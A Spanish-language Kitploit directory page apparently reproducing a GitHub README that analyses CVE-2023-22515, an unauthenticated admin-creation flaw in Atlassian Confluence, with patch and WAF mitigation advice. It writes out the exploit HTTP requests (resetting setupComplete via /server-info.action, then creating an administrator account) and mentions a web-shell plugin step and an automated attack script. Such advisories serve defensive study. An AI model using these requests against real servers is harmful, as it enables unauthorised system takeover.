Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-22515-1 | Kitploit
Herramientas/GitHubGitHub/dkq-k/cve-2023-22515-1
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubdkq-k/cve-2023-22515-1

cve-2023-22515-1

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2023-22515: Análisis en profundidad de la vulnerabilidad de elevación de privilegios en Confluence

[!IMPORTANT] Alerta de seguridad urgente: Esta vulnerabilidad tiene una puntuación CVSS de 10.0 (Crítico), el nivel de riesgo más alto. Si está utilizando una versión afectada, se requiere un parche inmediato.

1. Resumen (Overview)

CVE-2023-22515 es una vulnerabilidad crítica de control de acceso roto (Broken Access Control) descubierta en Atlassian Confluence Data Center y Server. Un atacante puede, sin autenticación, manipular de forma remota el estado de configuración del servidor, crear una cuenta de administrador y tomar el control total del sistema.

ElementoDetalles
ID de vulnerabilidadCVE-2023-22515
GravedadCRITICAL (CVSS 10.0)
Versiones afectadas8.0.0 ~ 8.5.1 (verificar versiones específicas)
Tipo de ataqueOmisión de autenticación y elevación de privilegios

2. Mecanismo de ataque (Attack Mechanism)

Esta vulnerabilidad se desencadena cuando un atacante cambia el valor de bootstrapStatusProvider.applicationConfig.setupComplete a false a través del endpoint /server-info.action.

🔍 Diagrama de secuencia del ataque

root@kitploit:~
sequenceDiagram
    participant Attacker as 😈 Atacante
    participant Server as 🖥️ Servidor Confluence
    participant Config as ⚙️ Administrador de configuración

    Note over Attacker, Server: Paso 1: Ataque de reinicio del estado de configuración
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: Desactivar el indicador de configuración completada en memoria
    Config-->>Server: Cambio de estado completado (cambio al modo de instalación)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: Paso 2: Creación de cuenta de administrador
    Attacker->>Server: POST /setup/setupadministrator.action<br/>(envío de nueva información de administrador)
    Server->>Server: Omisión de la validación de seguridad (permitido en modo de instalación)
    Server-->>Attacker: Creación de cuenta exitosa e inicio de sesión

    Note over Attacker, Server: Paso 3: Toma de control del sistema (RCE)
    Attacker->>Server: Carga de plugin malicioso (Web Shell)
    Server-->>Attacker: Obtención de ejecución remota de comandos

[!NOTE] Principio clave: Este método no modifica el archivo de configuración persistente (confluence.cfg.xml), sino que altera el estado de ejecución en memoria para eludir la lógica de control de acceso.

3. Análisis técnico (Technical Analysis)

Causa raíz (Root Cause)

Se debió a una vulnerabilidad en el enlace de parámetros del framework XWork2 y a la falta de validación de la entrada externa para el atributo sensible (setupComplete) en la clase de acción (Action) ServerInfoAction de Confluence.

Ejemplo de solicitud HTTP

Un atacante puede neutralizar el servidor con una simple solicitud HTTP.

1. Solicitud de reinicio de configuración:

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com

2. Solicitud de creación de administrador:

root@kitploit:~
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...

4. Reproducción de la vulnerabilidad (PoC & Demo)

Puede poner a prueba la vulnerabilidad en un entorno Docker seguro mediante el kit de reproducción (cve-2023-22515-repro) incluido en este informe.

🎥 Demostración cinematográfica

Se incluye un script de demostración que permite visualizar el proceso de explotación real en la terminal.

root@kitploit:~
# Comando para ejecutar la demostración
bash cinematic_pwn.sh

[!TIP] El script de demostración automatiza todo el proceso: realiza el ataque contra el servidor real (localhost:8090), crea una cuenta de administrador e intenta iniciar sesión.

5. Mitigación (Mitigation)

✅ Aplicar el parche más reciente (recomendado)

La solución más fiable es actualizar a las versiones corregidas proporcionadas por Atlassian.

  • Versión 8.3.3 o superior
  • Versión 8.4.3 o superior
  • Versión 8.5.2 o superior

⚠️ Medidas de mitigación temporales

Si no es posible aplicar el parche, bloquee el acceso a los siguientes patrones de URL en los dispositivos de seguridad de red (WAF, balanceadores de carga, etc.).

  • */setup/*

6. Conclusión (Conclusion)

CVE-2023-22515 es una vulnerabilidad crítica que, además de tener una dificultad de explotación muy baja, permite tomar el control total del sistema. Los responsables de seguridad deben aplicar el parche de inmediato y supervisar si se han producido incidentes de compromiso.


Fecha de redacción: 2026-01-16 | Autor: Antigravity Security Analysis Team

Descargar herramienta